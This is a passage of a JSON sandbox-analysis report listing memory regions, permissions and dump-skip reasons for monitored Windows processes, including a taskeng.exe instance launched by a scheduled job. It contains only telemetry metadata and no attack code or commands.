"region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1703", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1704", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:02:07.936", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "taskeng.exe {B729E5EE-8B96-46ED-936E-18C18B0189B1} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\\aDU0VK IWA5kLS:Interactive:Highest[1]", "filename": "c:\\windows\\system32\\taskeng.exe", "id": "proc_10", "image_name": "taskeng.exe", "monitor_reason": "created_scheduled_job", "monitored_id": 10, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1569", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:02:07.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1570", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:02:07.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1571", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:02:07.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1572", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:02:07.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1573", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:02:07.769", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_1574", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_1575", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1576", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1577", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_1578", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_1579", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_1580", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_1581", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 6127615, "entry_point": 0, "filename": null, "id": "region_1582", "name": "pagefile_0x0000000000450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4521984, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 7737343, "entry_point": 0, "filename": null, "id": "region_1583", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:02:07.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 28770303, "entry_point": 0, "filename": null, "id": "region_1584", "name": "pagefile_0x0000000000770000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7798784, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 28770304, "type": "region", "version": 1 }, "end_va": 32911359, "entry_point": 0, "filename": null, "id": "region_1585", "name": "pagefile_0x0000000001b70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28770304, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 34144255, "entry_point": 0, "filename": null, "id": "region_1586", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 34209792, "type": "region", "version": 1 }, "end_va": 34734079, "entry_point": 0, "filename": null, "id": "region_1587", "name": "private_0x00000000020a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34209792, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 35323903, "entry_point": 0, "filename": null, "id": "region_1588", "name": "private_0x0000000002130000", "norm_filename": null, "region_type": "private_memory", "start_va": 34799616, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35913727, "entry_point": 0, "filename": null, "id": "region_1589", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 36962303, "entry_point": 0, "filename": null, "id": "region_1590", "name": "private_0x0000000002240000", "norm_filename": null, "region_type": "private_memory", "start_va": 35913728, "timestamp": "00:02:07.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 41218047, "entry_point": 38273024, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1591", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 38273024, "timestamp": "00:02:07.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 41222144, "type": "region", "version": 1 }, "end_va": 42135551, "entry_point": 0, "filename": null, "id": "region_1592", "name": "pagefile_0x0000000002750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41222144, "timestamp": "00:02:07.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 42139648, "type": "region", "version": 1 }, "end_va": 42663935, "entry_point": 0, "filename": null, "id": "region_1593", "name": "private_0x0000000002830000", "norm_filename": null, "region_type": "private_memory", "start_va": 42139648, "timestamp": "00:02:07.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 44236799, "entry_point": 0, "filename": null, "id": "region_1594", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:02:07.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 44433408, "type": "region", "version": 1 }, "end_va": 44957695, "entry_point": 0, "filename": null, "id": "region_1595", "name": "private_0x0000000002a60000", "norm_filename": null, "region_type": "private_memory", "start_va": 44433408, "timestamp": "00:02:07.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1596", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:02:07.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1597", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:02:07.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1598", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:02:07.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1599", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:02:07.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1600", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:02:07.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1601", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:02:07.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 4293066752, "type": "region", "version": 1 }, "end_va": 4293541887, "entry_point": 4293129292, "filename": "\\Windows\\System32\\taskeng.exe", "id": "region_1602", "name": "taskeng.exe", "norm_filename": "c:\\windows\\system32\\taskeng.exe", "region_type": "memory_mapped_file", "start_va": 4293066752, "timestamp": "00:02:07.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791631527936, "type": "region", "version": 1 }, "end_va": 8791631564799, "entry_point": 8791631532448, "filename": "\\Windows\\System32\\TSChannel.dll", "id": "region_1603", "name": "tschannel.dll", "norm_filename": "c:\\windows\\system32\\tschannel.dll", "region_type": "memory_mapped_file", "start_va": 8791631527936, "timestamp": "00:02:07.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791712858112, "type": "region", "version": 1 }, "end_va": 8791712956415, "entry_point": 8791712862512, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1604", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791712858112, "timestamp": "00:02:07.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791716921344, "type": "region", "version": 1 }, "end_va": 8791717273599, "entry_point": 8791716969408, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1605", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791716921344, "timestamp": "00:02:07.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 8791717838848, "type": "region", "version": 1 }, "end_va": 8791718055935, "entry_point": 8791717843044, "filename": "\\Windows\\System32\\xmllite.dll", "id": "region_1606", "name": "xmllite.dll", "norm_filename": "c:\\windows\\system32\\xmllite.dll", "region_type": "memory_mapped_file", "start_va": 8791717838848, "timestamp": "00:02:07.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 8791718100992, "type": "region", "version": 1 }, "end_va": 8791718141951, "entry_point": 8791718110732, "filename": "\\Windows\\System32\\ktmw32.dll", "id": "region_1607", "name": "ktmw32.dll", "norm_filename": "c:\\windows\\system32\\ktmw32.dll", "region_type": "memory_mapped_file", "start_va": 8791718100992, "timestamp": "00:02:07.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791741825024, "type": "region", "version": 1 }, "end_va": 8791742115839, "entry_point": 8791741829220, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1608", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791741825024, "timestamp": "00:02:07.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791746347008, "type": "region", "version": 1 }, "end_va": 8791746441215, "entry_point": 8791746359992, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1609", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791746347008, "timestamp": "00:02:07.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 446464, "start_va": 8791747395584, "type": "region", "version": 1 }, "end_va": 8791747842047, "entry_point": 8791747399696, "filename": "\\Windows\\System32\\wevtapi.dll", "id": "region_1610", "name": "wevtapi.dll", "norm_filename": "c:\\windows\\system32\\wevtapi.dll", "region_type": "memory_mapped_file", "start_va": 8791747395584, "timestamp": "00:02:07.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791751196672, "type": "region", "version": 1 }, "end_va": 8791751348223, "entry_point": 8791751235160, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1611", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791751196672, "timestamp": "00:02:07.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791751393280, "type": "region", "version": 1 }, "end_va": 8791751454719, "entry_point": 8791751397392, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1612", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751393280, "timestamp": "00:02:07.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791752376320, "type": "region", "version": 1 }, "end_va": 8791752458239, "entry_point": 8791752380640, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1613", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791752376320, "timestamp": "00:02:07.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1614", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:02:07.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1615", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:02:07.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791757750272, "type": "region", "version": 1 }, "end_va": 8791758376959, "entry_point": 8791757757456, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1616", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791757750272, "timestamp": "00:02:07.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1617", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:02:07.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1618", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:02:07.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1619", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:02:07.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1620", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:02:07.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1621", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:02:07.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1622", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:02:07.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791781158911, "entry_point": 8791779193648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1623", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:02:07.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791784095744, "type": "region", "version": 1 }, "end_va": 8791784558591, "entry_point": 8791784168992, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1624", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791784095744, "timestamp": "00:02:07.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1625", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:02:07.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1626", "name": 